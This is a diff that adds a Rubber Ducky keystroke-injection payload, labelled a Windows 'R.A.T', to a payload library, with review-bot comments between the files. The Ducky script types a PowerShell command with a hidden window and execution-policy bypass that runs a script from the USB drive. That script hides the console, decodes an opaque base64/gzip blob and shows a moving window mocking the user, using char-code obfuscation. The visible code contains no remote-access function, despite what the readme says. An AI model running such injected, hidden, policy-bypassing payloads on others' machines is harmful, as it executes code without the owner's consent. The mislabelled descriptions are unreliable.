diff --git a/payloads/library/execution/Win_PoSH_RAT/R.ps1 b/payloads/library/execution/Win_PoSH_RAT/R.ps1
new file mode 100644
index 0000000..772fbc8
--- /dev/null
+++ b/payloads/library/execution/Win_PoSH_RAT/R.ps1
@@ -0,0 +1,59 @@
+function Hide-ConsoleWindow() {
+ $ShowWindowAsyncCode = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
+ $ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
+
+ $hwnd = (Get-Process -PID $pid).MainWindowHandle
+ if ($hwnd -ne [System.IntPtr]::Zero) {
+ # When you got HWND of the console window:
+ # (It would appear that Windows Console Host is the default terminal application)
+ $ShowWindowAsync::ShowWindowAsync($hwnd, 0)
+ } else {
+ # When you failed to get HWND of the console window:
+ # (It would appear that Windows Terminal is the default terminal application)
+
+ # Mark the current console window with a unique string.
+ $UniqueWindowTitle = New-Guid
+ $Host.UI.RawUI.WindowTitle = $UniqueWindowTitle
+ $StringBuilder = New-Object System.Text.StringBuilder 1024
+
+ # Search the process that has the window title generated above.
+ $TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle })
+ # Get the window handle of the terminal process.
+ # Note that GetConsoleWindow() in Win32 API returns the HWND of
+ # powershell.exe itself rather than the terminal process.
+ # When you call ShowWindowAsync(HWND, 0) with the HWND from GetConsoleWindow(),
+ # the Windows Terminal window will be just minimized rather than hidden.
+ $hwnd = $TerminalProcess.MainWindowHandle
+ if ($hwnd -ne [System.IntPtr]::Zero) {
+ $ShowWindowAsync::ShowWindowAsync($hwnd, 0)
+ } else {
+ Write-Host "Failed to hide the console window."
+ }
+ }
+}
+Hide-ConsoleWindow;
+[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
+Add-Type -Assembly PresentationFramework
+$I = New-Object System.IO.MemoryStream(,[Convert]::FromBase64String('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'))
+$O = New-Object System.IO.MemoryStream;
+$Z = New-Object System.IO.Compression.GzipStream $I, ([IO.Compression.CompressionMode]::Decompress);
+$Z.CopyTo($O);
+$Z.Close();
+$I.Close();
+$GR = $true;
+$S = [System.Windows.Forms.Screen]::PrimaryScreen;
+$W = [Windows.Markup.XamlReader]::Load((New-Object System.Xml.XmlNodeReader([xml][System.Text.Encoding]::UTF8.GetString($O.ToArray()))));
+$O.Close();
+$R = $W.FindName("R");
+$X = $W.FindName("U");
+$X.Text = "$U`n$([char]64)$IP`n$([char]105+[char]115+[char]32+[char]97+[char]32+[char]82+[char]97+[char]116)";
+$H = [Windows.Input.MouseButtonEventHandler]{$W.Close();$_.Handled=$true;}
+$W.Add_MouseRightButtonDown($H);
+$W.Left = $S.WorkingArea.Left;
+$W.Top = $S.Bounds.Height - $W.Height;
+$T = New-Object System.Windows.Forms.Timer;
+$T.Interval = 100;
+$T.add_Tick({if($GR){if(($W.Left+5)-lt($S.WorkingArea.Width-$W.Width)){$W.Left=($W.Left+5)}else{$R.ScaleX=-1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"100,0,0,0" }}else{if(($W.Left-5)-gt0){$W.Left=($W.Left-5)}else{$R.ScaleX=1;$script:GR=!$GR;$X.Margin = [System.Windows.Thickness]"0"}}});
+$W.Add_Closing({$T.Stop();$T.Dispose();})
+$T.Start();
+$W.ShowDialog();
\ No newline at end of file
diff --git a/payloads/library/execution/Win_PoSH_RAT/payload.txt b/payloads/library/execution/Win_PoSH_RAT/payload.txt
new file mode 100644
index 0000000..bf964c0
--- /dev/null
+++ b/payloads/library/execution/Win_PoSH_RAT/payload.txt
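Review bot: The base64 string on the `$I = New-Object System.IO.MemoryStream(...)` line is an opaque gzip blob that is decompressed and handed to `[Windows.Markup.XamlReader]::Load`, so nothing in this diff lets a maintainer see what window the script renders; committing the plaintext XAML next to R.ps1, or at least describing its content and how the blob is regenerated in the readme, would make the payload reviewable (the blob itself is elided in this view, so only the decode path is visible). Two smaller points in the same hunk: `$StringBuilder = New-Object System.Text.StringBuilder 1024` is never read and can be dropped, and `[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")` is an obsolete API whose supported form is `Add-Type -AssemblyName System.Windows.Forms`, consistent with the `Add-Type -Assembly PresentationFramework` line that follows. The `$X.Text` assignment builds its last line from `[char]` codes that decode to the literal text `is a Rat`; writing it as a plain string reads identically and makes the intent obvious to anyone reviewing or triaging the script.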
@@ -0,0 +1,41 @@
+REM TITLE R.A.T
+REM AUTHOR TRIBBIC
+REM DESCRIPTION Set up a R.A.T on the target windows machine
+REM DUCKY SCRIPT 3
+
+REM USERNAME to login to the R.A.T
+DEFINE #USERNAME name
+REM Your IP Address use https://www.ipchicken.com/ to get your IP
+DEFINE #IPADDRESS 192.168.1.1
+ATTACKMODE HID STORAGE
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+GUI r
+DELAY 200
+STRINGLN powershell -Noni -NoP -W h -EP Bypass $U='#USERNAME';$IP='#IPADDRESS'; iex((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter+':\R.ps1')
\ No newline at end of file
diff --git a/payloads/library/execution/Win_PoSH_RAT/readme.md b/payloads/library/execution/Win_PoSH_RAT/readme.md
new file mode 100644
index 0000000..e704af9
--- /dev/null
+++ b/payloads/library/execution/Win_PoSH_RAT/readme.md
@@ -0,0 +1,22 @@
+# RAT
+- Author: TRIBBIC
+- Version: 1.0
+- Target: Windows 10 (Powershell 5.1+)
+- Category: Execution
+- Attackmode: HID & Storage
+- Ducky Script Version: 3
+
+## Setup
+In the payload.txt change the two DEFINE's
+
+\#USERNAME Should be your login name
+
+\#IPADDRESS Should be your IP Address
+
+## Description
+Create a R.A.T using Windows Powershell on Targets PC
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
\ No newline at end of file
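Review bot: The header lines `REM DESCRIPTION Set up a R.A.T on the target windows machine` and `REM USERNAME to login to the R.A.T` describe functionality that the R.ps1 this payload launches does not visibly contain: that script renders a WPF window whose text is the user name, `@` plus the IP, and `is a Rat` on three lines, animates it across the screen and closes it on right-click, with no listener, connection or login code in view (its XAML blob is elided here, so this is inferred from the decode path alone). The description, the USERNAME comment and the readme's `Create a R.A.T using Windows Powershell on Targets PC` should state what the payload actually does so library users and anyone triaging the script are not misled; something like `REM DESCRIPTION Displays a moving "<user>@<ip> is a Rat" window on the target (prank)` would match the visible behaviour. The `REM Your IP Address use https://www.ipchicken.com/ to get your IP` line likewise reads as though the address is used for a connection, whereas the script only prints it in the window text.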